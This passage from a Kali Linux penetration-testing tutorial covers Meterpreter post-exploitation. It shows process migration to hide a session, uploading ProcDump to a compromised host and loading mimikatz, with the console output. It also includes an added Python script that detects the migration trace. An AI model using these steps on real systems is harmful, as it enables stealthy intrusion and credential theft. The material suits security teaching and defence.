• Using Meterpreter | 189
  • Learning Kali Linux
Process Manipulation
You will want to do a few things with processes. One of the first things is to migrate your connection from the process you compromised. This will help you to cover your tracks by getting connected to a less obvious process. As an example, you may migrate to an Explorer.EXE process or, as in the case of Example 6-12, the notepad.exe process. To do this process migration, we need to load another post-exploitation module. This one is post/windows/manage/migrate. It will automatically determine another process to migrate to and, as in this case, launch a process if necessary.


Example 6-12. Migrating to the notepad.exe process
meterpreter > run post/windows/manage/migrate
[*] Running module against VAGRANT-2008R2
[*] Current server process: spoolsv.exe (984)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 6092
[*] New server process: notepad.exe (6092)
meterpreter >
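The migration in Example 6-12 leaves a trace on the target: the print-spooler service spawned notepad.exe. The script below is an added detection example, not code from the book, that flags that parent/child pairing in a process-creation log; the event records and the Sysmon-style field names are constructed assumptions.

```python
"""Flag the process-tree trace left by Meterpreter's migrate module.

Constructed example (not the book's code): in Example 6-12 the module spawned
notepad.exe from the compromised spoolsv.exe (PID 984). A Windows service
launching an interactive editor is an anomaly a defender can alert on.
Field names loosely follow Sysmon Event ID 1 (an assumption, not from the book).
"""
from dataclasses import dataclass

# Service/system processes that never legitimately start GUI applications
# (names taken from the process listing on this page).
SERVICE_PARENTS = {"spoolsv.exe", "svchost.exe", "services.exe",
                   "lsass.exe", "wininit.exe", "lsm.exe"}
# Interactive applications migration commonly lands in; the book names
# Explorer.EXE and notepad.exe, the others are assumptions.
INTERACTIVE_CHILDREN = {"notepad.exe", "explorer.exe", "calc.exe", "mspaint.exe"}


@dataclass(frozen=True)
class ProcessCreate:
    parent_pid: int
    parent_image: str
    pid: int
    image: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (case-insensitive matching)."""
    return path.rsplit("\\", 1)[-1].lower()


def find_service_spawned_gui(events):
    """Return the events in which a service process spawned a GUI application."""
    return [ev for ev in events
            if basename(ev.parent_image) in SERVICE_PARENTS
            and basename(ev.image) in INTERACTIVE_CHILDREN]


# Constructed sample log: the Example 6-12 migration plus benign activity.
SAMPLE_EVENTS = [
    ProcessCreate(432, r"C:\Windows\System32\services.exe", 984, r"C:\Windows\System32\spoolsv.exe"),
    ProcessCreate(984, r"C:\Windows\System32\spoolsv.exe", 6092, r"C:\Windows\System32\notepad.exe"),
    ProcessCreate(1540, r"C:\Windows\Explorer.EXE", 2212, r"C:\Windows\System32\notepad.exe"),
    ProcessCreate(432, r"C:\Windows\System32\services.exe", 568, r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for hit in find_service_spawned_gui(SAMPLE_EVENTS):
        print(f"ALERT: {basename(hit.parent_image)} ({hit.parent_pid}) "
              f"spawned {basename(hit.image)} ({hit.pid})")
```

Only the spoolsv.exe -> notepad.exe record is reported; the notepad.exe started by Explorer.EXE is the normal user case and passes.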
We can also look at dumping processes and recovering them. This will provide us with anything that may be in memory while the application is running and allow us to extract passwords or other sensitive information. To do this, we're going to upload the ProcDump utility from Microsoft's SysInternals team. We will get a dump file from a running process that will capture not only the code of the program but also the data from the running program. Before we can get the dump file, though, I have procdump64.exe staged on my Kali instance so I can upload it. In Example 6-13, you can see I upload the program I need, which will put it up to the compromised Windows system for use later. This required that I use the Meterpreter payload, so I had the upload capability. Without it, I would have to resort to relying on other file transfer methods.
Example 6-13. Uploading a program using Meterpreter
meterpreter > upload procdump64.exe
[*] uploading : procdump64.exe -> procdump64.exe
[*] uploaded : procdump64.exe -> procdump64.exe
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > mimikatz_command -f handle::list
212 smss.exe -> 80 Process 288 csrss.exe
212 smss.exe -> 84 Process 456 lsm.exe
212 smss.exe -> 88 Process 348 csrss.exe
288 csrss.exe -> 80 Process 340 wininit.exe
288 csrss.exe -> 180 Process 432 services.exe
288 csrss.exe -> 208 Process 448 lsass.exe
288 csrss.exe -> 224 Process 456 lsm.exe
288 csrss.exe -> 336 Process 568 svchost.exe
288 csrss.exe -> 364 Process 332 spoolsv.exe
288 csrss.exe -> 404 Process 644 svchost.exe
288 csrss.exe -> 444 Process 696 svchost.exe
288 csrss.exe -> 516 Process 808 svchost.exe
288 csrss.exe -> 564 Process 868 svchost.exe
288 csrss.exe -> 588 Process 912 svchost.exe
You'll see that after the program was uploaded, I loaded mimikatz again. While there are other ways to achieve what I need, I wanted to demonstrate this. The reason is we